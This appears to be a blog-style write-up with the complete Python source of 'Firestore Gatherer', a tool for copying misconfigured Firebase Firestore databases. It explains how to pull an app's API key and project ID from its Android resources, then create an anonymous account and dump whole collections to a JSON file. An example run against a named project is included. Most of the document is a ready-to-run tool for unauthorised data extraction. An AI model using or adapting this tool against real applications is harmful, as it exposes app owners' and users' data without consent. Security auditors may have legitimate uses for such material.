Firestore Gatherer - Copying an unprotected Firestore database

Introduction

Firebase Firestore is a cloud NoSQL database provided by Google as part of the Firebase platform. It lets developers store, sync, and query data in real time for their web, mobile, and server applications. Data is organized into individual documents that are grouped into collections. Each document is a JSON-like structure made up of key-value pairs.
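To make the document model concrete, the sketch below shows roughly how a single document looks when it is returned by the Firestore REST API: every value is wrapped in an object whose only key names its type. The project, collection, and field names are made up for illustration, and field_types is a hypothetical helper that is not part of the tool.

```python
# Illustrative document in the shape returned by the Firestore REST API.
# The project, collection, and field names are hypothetical.
sample_document = {
    "name": "projects/example-project/databases/(default)/documents/users/alice",
    "fields": {
        "displayName": {"stringValue": "Alice"},
        "age": {"integerValue": "30"},  # 64-bit integers are sent as strings
        "verified": {"booleanValue": True},
    },
    "createTime": "2024-01-01T00:00:00Z",
    "updateTime": "2024-01-02T00:00:00Z",
}


def field_types(document):
    """Return a {field name: value type} mapping for a REST document."""
    return {
        name: next(iter(wrapper))  # each wrapper holds exactly one type key
        for name, wrapper in document.get("fields", {}).items()
    }


print(field_types(sample_document))
```

This typed wrapping is the reason the tool converts every field before writing it to the output file.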

Two kinds of security problems can leave a project that uses Firebase Firestore unprotected:

Misconfigured security rules: Firestore lets developers define security rules that control who can read from and write to the database. If these rules are not configured correctly, the database may be exposed to unauthorized access.
Missing user-level access control: If user authentication and authorization are not implemented properly, unauthorized users may be able to access sensitive data in Firestore.

To exploit these weaknesses, a Python tool has been developed. Given a few parameters, which can be obtained from the original application that uses the database, it creates an anonymous user account and saves a copy of the database to a file in JSON format.

Using Firestore Gatherer

To use the program, first define two variables, apiKey and projectId, in a JSON configuration file. For an Android application, they can be obtained by unpacking it and looking at the res/values/strings.xml file. The configuration file would look like this:

{
    "apiKey": "Value of the google_api_key variable",
    "projectId": "Value of the project_id variable"
}
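As a rough sketch of that extraction step, the snippet below builds the configuration from the text of strings.xml. It assumes the file has already been decoded into plain XML, and config_from_strings_xml and the sample values are hypothetical, not part of the tool.

```python
import json
import xml.etree.ElementTree as ET


def config_from_strings_xml(xml_text):
    """Build the tool's configuration dict from the text of strings.xml."""
    root = ET.fromstring(xml_text)
    # Index every <string name="...">value</string> resource by its name
    strings = {node.get("name"): (node.text or "") for node in root.iter("string")}
    return {
        "apiKey": strings["google_api_key"],
        "projectId": strings["project_id"],
    }


# Hypothetical excerpt of a decoded res/values/strings.xml
sample_xml = """<resources>
    <string name="app_name">Example</string>
    <string name="google_api_key">EXAMPLE_API_KEY</string>
    <string name="project_id">example-project</string>
</resources>"""

print(json.dumps(config_from_strings_xml(sample_xml), indent=4))
```

The printed JSON can be saved as the file passed with -f. A KeyError here means the application does not expose one of the two values in strings.xml.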

The parameters are the following:

-f: The JSON configuration file
-c: The collections to retrieve from the database, separated by commas, for example collection1,collection2
-t: Specify it to save the creation and modification time of each document
-a: By default the program only downloads the first page of documents of each collection. If this parameter is specified, all pages are downloaded. WARNING: THIS CAN CONSUME THE DATABASE QUOTA AND INCUR EXTRA BILLING
-o: The output file in which the database will be saved
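The difference that -a makes can be sketched as a small paging loop. This is a simplified illustration, not the tool's code: fetch_page is a hypothetical callable standing in for one REST request, and the fake backend below replaces the real API so that the example runs offline.

```python
def fetch_all_pages(fetch_page, retrieve_all=False):
    """Collect documents page by page.

    fetch_page(page_token) is a hypothetical callable that returns one
    response dict, optionally containing 'documents' and 'nextPageToken'.
    """
    documents = []
    page_token = None
    while True:
        response = fetch_page(page_token)
        documents.extend(response.get("documents", []))
        page_token = response.get("nextPageToken")
        # Stop after the first page unless all pages were requested,
        # or when the server reports no further pages.
        if not retrieve_all or page_token is None:
            break
    return documents


# Fake two-page backend standing in for the REST API
fake_pages = {
    None: {"documents": ["doc1", "doc2"], "nextPageToken": "t1"},
    "t1": {"documents": ["doc3"]},
}

first_page_only = fetch_all_pages(fake_pages.get)
everything = fetch_all_pages(fake_pages.get, retrieve_all=True)
print(len(first_page_only), len(everything))
```

Every page requested is another round of document reads against the target project, which is why retrieving everything is opt-in.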

This is an example run:

$ firebase_gatherer.py -f firebase_cfg.json -c collection1,collection2,collection3 -o firebase_db.json
Welcome to Firebase Gatherer. Gathering ['collection1', 'collection2', 'collection3'] collections from red-alloy-245217 project.
WARNING:root:From collection collection1 fetched 3 records
WARNING:root:From collection collection2 fetched 3 records
WARNING:root:From collection collection3 fetched 25 records
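The output file holds a list with one entry per collection, each with a name and a documents list. As a minimal sketch of how such a dump could be inspected afterwards, the snippet below counts the documents per collection. summarize_dump and the sample data are hypothetical and only mirror that layout.

```python
import json


def summarize_dump(dump):
    """Return {collection name: number of documents} for a loaded dump."""
    return {col["name"]: len(col["documents"]) for col in dump}


# Hypothetical dump with the same layout the tool writes to the -o file
sample_dump = json.loads("""
[
    {"name": "collection1",
     "documents": [{"id": "projects/p/databases/(default)/documents/collection1/a"}]},
    {"name": "collection2", "documents": []}
]
""")

print(summarize_dump(sample_dump))
```

For a real run, the list would be loaded from the file given to -o with json.load instead of from the inline sample.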

Source code

import argparse
import json
import logging
import os
import requests

FIREBASE_DOCUMENTS_ENDPOINT = 'https://firestore.googleapis.com/v1/projects/{0}/databases/(default)/documents/{1}'
GOOGLE_IDENTITY_ENDPOINT = 'https://www.googleapis.com/identitytoolkit/v3/relyingparty/signupNewUser'

firestore_rest_errors = {
    'ABORTED': 'The request conflicted with another request.',
    'ALREADY_EXISTS': 'The request tried to create a document that already exists.',
    'DEADLINE_EXCEEDED': 'The Cloud Firestore server handling the request exceeded a deadline.',
    'FAILED_PRECONDITION': 'The request did not meet one of its preconditions. For example, a query request might require an index not yet defined. See the message field in the error response for the precondition that failed.',
    'INTERNAL': 'The Cloud Firestore server returned an error.',
    'INVALID_ARGUMENT': 'A request parameter includes an invalid value. See the message field in the error response for the invalid value.',
    'NOT_FOUND': 'The request attempted to update a document that does not exist.',
    'PERMISSION_DENIED': 'The user is not authorized to make this request.',
    'RESOURCE_EXHAUSTED': 'The project exceeded either its quota or the region/multi-region capacity.',
    'UNAUTHENTICATED': 'The request did not include valid authentication credentials.',
    'UNAVAILABLE': 'The Cloud Firestore server returned an error.'
}

'''
proxy_dict = { 
        'http'  : 'http://127.0.0.1:8888', 
        'https' : 'http://127.0.0.1:8888',
}
'''
proxy_dict = {}

def get_document_field(field_type, value):
    field = None
    # Convert a typed Firestore REST value into a plain Python value
    if field_type in ['stringValue', 'doubleValue', 'booleanValue', 'nullValue', 'timestampValue', 'referenceValue', 'bytesValue']:
        field = value
    elif field_type == 'integerValue':
        # 64-bit integers arrive as strings in the REST representation
        field = int(value)
    elif field_type == 'mapValue':
        field = get_document_fields(value, {}, False)
    elif field_type == 'arrayValue':
        field = []
        # An empty array may come without a 'values' key
        for item in value.get('values', []):
            for item_type, item_value in item.items():
                field.append(get_document_field(item_type, item_value))
    elif field_type == 'geoPointValue':
        field = str(value['latitude']) + ', ' + str(value['longitude'])
    return field

def get_document_fields(doc, document, timestamp):
    # Documents and maps without any field have no 'fields' key
    for field_name, field_value in doc.get('fields', {}).items():
        for field_type, value in field_value.items():
            document[field_name] = get_document_field(field_type, value)
    # The timestamps live in the REST document, not in the converted one
    if timestamp and 'createTime' in doc and 'updateTime' in doc:
        document['create_time'] = doc['createTime']
        document['update_time'] = doc['updateTime']
    return document

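def get_firestore_collection(collection_name, timestamp, retrieve_all_pages):
    documents = []
    next_page_token = None
    retries_left = 3  # Avoid looping forever on errors that a new token cannot fix
    while True:
        url = FIREBASE_DOCUMENTS_ENDPOINT.format(firebaseConfig['projectId'], collection_name)
        headers = {
            'Authorization': 'Firebase ' + firebaseConfig['tokenId']
        }
        params_dict = {}
        if next_page_token is not None:
            params_dict['pageToken'] = next_page_token
        req = requests.get(url, headers=headers, params=params_dict, proxies=proxy_dict)
        req_json = req.json()
        if req.status_code != 200:
            # Unknown statuses must not raise a KeyError while reporting the error
            status = req_json.get('error', {}).get('status')
            message = firestore_rest_errors.get(status, 'Unexpected error from the Firestore server.')
            if retries_left == 0:
                logging.error(message + ' Giving up.')
                break
            retries_left -= 1
            logging.error(message + ' Retrying...')
            generate_anon_token()
            continue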

        if 'documents' in req_json:
            for doc in req_json['documents']:
                document = {}
                document['id'] = doc['name']
                document = get_document_fields(doc, document, timestamp)
                documents.append(document)
        
        logging.warning('From collection ' + collection_name + ' fetched ' + str(len(documents)) + ' records')

        if 'nextPageToken' in req_json and retrieve_all_pages:
            next_page_token = req_json['nextPageToken']
        else:
            break
    return documents

def generate_anon_token():
    params_dict = {
        'key': firebaseConfig['apiKey']
    }
    req = requests.post(GOOGLE_IDENTITY_ENDPOINT, params=params_dict, proxies=proxy_dict)
    json_response = req.json()
    firebaseConfig['tokenId'] = json_response['idToken']
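    # Persist the token so later runs can reuse it; the file is closed on exit
    with open(filename, 'w') as config_file:
        json.dump(firebaseConfig, config_file, indent=4)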
    logging.warning('Generated new token id: ' + firebaseConfig['tokenId'][:8] + '...')

def get_arguments():
    parser = argparse.ArgumentParser(prog='Firestore Gatherer', description='Gather the contents of an unprotected Firestore Database.')
    parser.add_argument('-f', '--config-file', help='File containing the Firestore configuration', required=True)
    parser.add_argument('-c', '--collections', help='Names of the collections, separated by commas. Example: collection1,collection2', required=True)
    parser.add_argument('-t', '--timestamp', help='Save the timestamp for every document.', action=argparse.BooleanOptionalAction, default=False)
    parser.add_argument('-a', '--retrieve-all', help='By default the program only fetches the first page of every collection. With this adjustment, it will retrieve all pages. WARNING: THIS CAN CONSUME THE DATABASE QUOTA AND INCUR INTO EXTRA BILLING!!!', action=argparse.BooleanOptionalAction, default=False)
    parser.add_argument('-o', '--output-file', help='File to save the database.', required=True)
    return parser.parse_args()

# Load configuration from file
args = get_arguments()
filename = args.config_file
if not os.path.exists(filename):
    logging.error('The specified filename does not exist')
    exit(-1)
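try:
    with open(filename) as config_file:
        firebaseConfig = json.load(config_file)
    for key in firebaseConfig:
        # all fields ['apiKey', 'authDomain', 'databaseURL', 'projectId', 'storageBucket', 'messagingSenderId', 'appId', 'tokenId']
        if key not in ['apiKey', 'projectId', 'tokenId']:
            raise ValueError('Unexpected key: ' + key)
    # Both values are needed to request a token and to build the request URL
    for required_key in ['apiKey', 'projectId']:
        if required_key not in firebaseConfig:
            raise ValueError('Missing key: ' + required_key)
except Exception:
    logging.error('The loaded file is invalid')
    exit(-1)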

# Generate token
if 'tokenId' not in firebaseConfig:
    generate_anon_token()

# Collection argument
try:
    collections = args.collections.split(',')
except:
    logging.error('Invalid collections specified')
    exit(-1)

# Other arguments
timestamp = args.timestamp
output_file = args.output_file
retrieve_all = args.retrieve_all

print('Welcome to Firebase Gatherer. Gathering ' + str(collections) + ' collections from ' + firebaseConfig['projectId'] + ' project.')

lib = []
for collection in collections:
    col = {}
    col['name'] = collection
    col['documents'] = get_firestore_collection(collection, timestamp, retrieve_all)
    lib.append(col)

# Write the gathered collections and make sure the file is flushed and closed
with open(output_file, 'w') as dump_file:
    json.dump(lib, dump_file, indent=4)
